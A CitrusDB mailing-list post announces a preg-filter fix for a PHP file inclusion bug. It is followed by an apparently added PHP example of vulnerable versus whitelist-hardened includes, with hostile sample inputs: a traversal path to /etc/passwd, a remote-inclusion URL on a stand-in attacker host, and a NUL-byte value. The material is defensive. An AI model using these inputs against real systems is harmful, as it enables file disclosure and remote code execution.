There is a vulnerability in citrus that can be patched by adding a preg filter around line 99 of the index.php file that will prevent the php file inclusion vulnerability. This vulnerability is only exploitable to users already logged into citrus.
http://bazaar.launchpad.net/~paul-citrusdb/citrusdb/gpg/revision/417/index.php

The SQL injection vulnerability is not exploitable because the injected code is filtered out before it gets to that database query. The preg filter will be included in the next release of citrus, which I hope to get online soon.

http://seclists.org/bugtraq/2012/Apr/53

Paul
--
The CitrusDB Project | http://www.citrusdb.org
Open Source Customer Care & Billing System

_______________________________________________
Citrusdb-users mailing list
Citrusdb-users@lists.sourceforge.net
https://lists.sourceforge.net/lists/listinfo/citrusdb-users
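The kind of "preg filter" fix described in the message, shown as an added illustration that is not CitrusDB's own code and not the actual patch at index.php line 99. The page does not say which request parameter reached the include, so the parameter name (`load`), the `pages/` directory and the page-name grammar below are assumptions; the point is the shape of the check (anchored whitelist pattern applied before any path is built) and one caveat a practitioner should know about PCRE's `$` anchor.

```php
<?php
// Added example, not code from the CitrusDB project. The request parameter
// name, the pages/ directory and the allowed-name grammar are assumptions.

// Vulnerable pattern: raw request input is spliced into the include path.
// "?load=../../../../etc/passwd" walks out of pages/; with allow_url_include
// on, "?load=http://attacker.example/shell.txt" would fetch and run remote code.
function load_page_vulnerable(string $page): string
{
    return __DIR__ . '/pages/' . $page . '.php';
}

// Hardened pattern: a preg filter that only admits a short, anchored token.
// Nothing containing '/', '.', ':' or a NUL byte can pass, so traversal,
// remote URLs and NUL truncation are all rejected before a path exists.
function page_name_is_safe(string $page): bool
{
    // Caveat: in PCRE, '$' also matches just before a trailing "\n", so
    // /^[a-z0-9_]+$/ would accept "customers\n". Use \z (absolute end) or
    // the D modifier to close that gap.
    return preg_match('/^[a-z0-9_]{1,32}\z/', $page) === 1;
}

function load_page_hardened(string $page): ?string
{
    if (!page_name_is_safe($page)) {
        return null;   // caller renders an error page instead of including anything
    }
    $base = realpath(__DIR__ . '/pages');
    $real = realpath(__DIR__ . '/pages/' . $page . '.php');
    // Belt and braces: the resolved file must really live under pages/.
    if ($base === false || $real === false
        || strpos($real, $base . DIRECTORY_SEPARATOR) !== 0) {
        return null;
    }
    return $real;
}

// Constructed sample inputs exercising the filter (not real requests).
$samples = [
    'customers',                       // legitimate page name -> allowed
    '../../../../etc/passwd',          // directory traversal  -> blocked
    'http://attacker.example/x.txt',   // remote inclusion     -> blocked
    "customers\0",                     // NUL-byte truncation  -> blocked
    "customers\n",                     // would pass with '$', blocked with \z
];
foreach ($samples as $s) {
    printf("%-34s -> %s\n", json_encode($s),
        page_name_is_safe($s) ? 'allowed' : 'blocked');
}
```

The whitelist is deliberately stricter than "strip dangerous characters": a blacklist has to anticipate every encoding and traversal trick, whereas an anchored `[a-z0-9_]` token leaves nothing for `include` to interpret. The `realpath` comparison is a second, independent guard in case the page list ever grows to include names the pattern would admit but the directory layout would not.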